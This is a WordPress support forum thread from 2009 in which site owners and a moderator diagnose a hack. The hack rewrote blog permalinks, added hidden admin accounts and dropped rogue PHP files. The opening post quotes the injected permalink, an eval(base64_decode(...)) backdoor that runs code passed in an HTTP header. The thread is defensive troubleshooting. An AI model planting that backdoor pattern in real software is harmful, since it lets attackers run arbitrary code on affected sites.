WP adding code to the end of url links breaking them

  • This just started today, and I’m not certain why it is happening. At the end of any link, WP is appending the following “/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%/” to the end of the link.

    I’m far from an expert on WP code (I deal mostly with Drupal) so I’m not certain how WP is building links/passing the link information information. The theme link is correctly set to <?php the_permalink() ?>.

    Any thoughts on why this is happening?

Viewing 15 replies - 46 through 60 (of 66 total)

  • Has anyone else seen wp-pass.php or xmlrpc.php uploaded to their FTP? I see both…should I delete or modify them? Not sure if they’re part of this hack. I was able to delete the new admin and change the permalinks, but want to fix anything else that may be broken.

    @robk30

    xmlrpc.php (in root folder) is part of the normal install of WP, but I deleted it because I do not need it personally, and it’s a potential entry point for hackers.

    wp-pass.php in /wp-content/uploads shouldn’t be there (as far as I know). Nor any PHP files in the “uploads” folder.

    Wow what a friday….

    Guys, I was running 2.8.3 and only saw that the script managed to change my permalinks. no admin user created or other things. I did see a wp-inclode.php and a fotter.php in the uploads dir. I removed those.

    My blog is acting weird. It is really slow (the admin interface) and it cannot contact akismet. anyone experiencing this since the bot attack?

    plus im seeing a lot more spam….

    @pielface

    I think you are the first person reporting the hack using 2.8.x

    Everyone else so far was on 2.7.x

    I wonder if the latest is actually safe if 2.8.3 is not.

    If someone could upload PHP files to your server and modify the database, I would imagine that everything else is possible.

    The admin user is hidden from you by a clever user of Javascript. Are you sure you don’t have a hidden admin?

    Hm, the index.php that was in the content folder had only this in it:

    <?php
    // Silence is golden.
    ?>

    The other file had a bunch of code.

    @dyske

    @zeppelined

    I too have a index.php in /wp-content/ with the “silence is golden”.

    I only show 1 admin (my account). under the “users” option.

    but still, the interface is slow…and no contact with akismet. I just updated to 2.8.4. no luck.

    OK scratch the latency issues.

    That was a different DNS issue.

    Looks like 2.8.x only had the permalink altered. No admin users created

    Do you guys think I should delete wp-pass.php?

    @robk30

    I deleted wp-pass.php that was in my “uploads” folder.

    I have that “Silence is Golden” uploads.php file in a few places, but not in the Uploads directory.

    Should that file be deleted?

    I am running WordPress 2.8.2
    I’ve got the the updated permalink structure and the hidden administrator.
    No file uploads oder modified files.

    Interesting facts:
    1st:
    I’ve got a mail from one of my readers who told me that my links don’t work. This was at 11 o clock in the morning.
    According to the database the creation of the hidden administrator account was at 16 o clock. So the user was createed AFTER the permalink has allreday been changed.

    2nd: I don’t allow registrations. But I had three registrations in the previous 4 days. These user acccounts seem to be “normal”; no special code in any fields.

    I’ll chek the server logfiles. This could take some time.

    Should have reacted sooner.

    I have to correct myself.

    I am not sure if the register option was enabled or not.

    I found the script that is supposed to be executed by the modified permalink. This script seemmsto deactive the register option.

    Still no idea who the permmalink was modified.
    I’m on it.

    Seems as this is a perfect exammple of cross site scripting.

    I can confirm this hacked worked (at least partially) on my site running 2.8.4

    There were 2 new admin accounts created but no files or permalinks were changed.

    The 2 new admin accounts were created with the javascript code embeded in their associated wp_usermeta values like we have seen so far.

    All my other 2.8.4 sites seem to be fine, but this one site was “hacked” so to speak.

    No real damage one other than the user accounts being created and the wp_usermeta values being added to hide the users from showing on the wp-admin users page.

    Just wanted to confirm that this IS affecting 2.8.4 though.

    Moderator Samuel Wood (Otto)

    (@otto42)

    www.ads-software.com Admin

    I’ve analysed one of these hacked sites now, and worked out how it was done, basically. 2.8.3 fixed this particular vulnerability, and the permalink change is indeed the first step in the attack. Files are then added to the system via that route, creating more exploitable backdoors. This is a pretty standard hack methodology really: exploit to load standard hacking code from elsewhere.

    Note the that flaw requires you to allow registration on your blog. Blogs that don’t allow registration would not be vulnerable.

    The latest two versions of WordPress are NOT vulnerable to this particular attack vector. This is confirmed.

    If you don’t see the permalink change, then your blog was attacked via a different means (possibly exploiting backdoors left behind from previous intrusions before you upgraded). However, the payload and result would likely be identical, even if the method differed. Standard hacker tools tend to use the same payloads regardless of the entry method. Just shows you got hacked by the same guy as everybody else.

    Background: I am an experienced webmaster but have not spent any time with my wordpress installation. My site was compromised over the long weekend, with a handful of files modified at three different times, and a “secret” admin installed at a fourth time.

    My registrations were absolutely disabled — I needed to enable them to register a guest account so that I could then get the edit URL so then I could use the edit function on this intruder. Yet I had 5 successful registrations in the 4 days prior to being hacked, and none since.

    I had several files around the site that had malicious code inserted immediately following the opening PHP tags. I had a .htaccess file that redirected non-existent file requists to index.php changed to remove that code. I had an index.php file added.

    I had the “hidden” admin user, but I do not see any permalink code anywhere on my site. m The admin user did not have an email address associated with it in the database.

    The files modified were as follows:
    /.htaccess
    /wp-load.php
    /wp-admin/link-category.php
    /wp-content/index.php
    /wp-includes/class-wp-dependencies.php
    /wp-includes/index.php (added)

    I’m not sure what version of wp I’m running, but I am running WPAU and the dashboard is suggesting I upgrade to 2.8.4

    Since I don’t seem to be affected by the permalink issue (and the wp blog on my site is dormant for all intents and purposes), I only caught this because I noticed changed files were about to be copied during my backup process.

Viewing 15 replies - 46 through 60 (of 66 total)
  • The topic ‘WP adding code to the end of url links breaking them’ is closed to new replies.